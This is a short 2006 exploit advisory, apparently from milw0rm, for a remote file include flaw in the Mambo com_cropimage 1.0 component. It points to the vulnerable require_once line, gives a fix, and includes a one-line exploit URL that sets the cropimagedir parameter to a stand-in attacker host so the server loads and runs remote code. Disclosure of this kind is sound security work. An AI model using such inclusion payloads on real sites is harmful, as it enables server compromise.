Mambo com_cropimage 1.0 Component Remote Include Vulnerability

2006-08-21T00:00:00
ID SECURITYVULNS:DOC:13963
Type securityvulns
Reporter Securityvulns
Modified 2006-08-21T00:00:00

Description

####### C Y B E R - W A R R I O R T I M

Mambo com_cropimage 1.0 Component Remote Include Vulnerability

Author: XORON

Class: Remote

cont@ct: x0r0n[at]hotmail[dot]com

Code: in admin.cropcanvas.php , line 7

require_once $cropimagedir."class.cropinterface.php";

Fix: 1-)open admin.cropcanvas.php

   2-)add this code before line 7

    defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

Exploit:

http://www.site.com/[path]/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://evil_scripts?

Greetz: str0ke, Ironfist, Preddy, SHiKaA, mdx, DJR, DaRK,R3D4C!D,iNSoMNiA and all my friend

milw0rm.com [2006-08-19]

orj adv: http://www.milw0rm.com/exploits/2217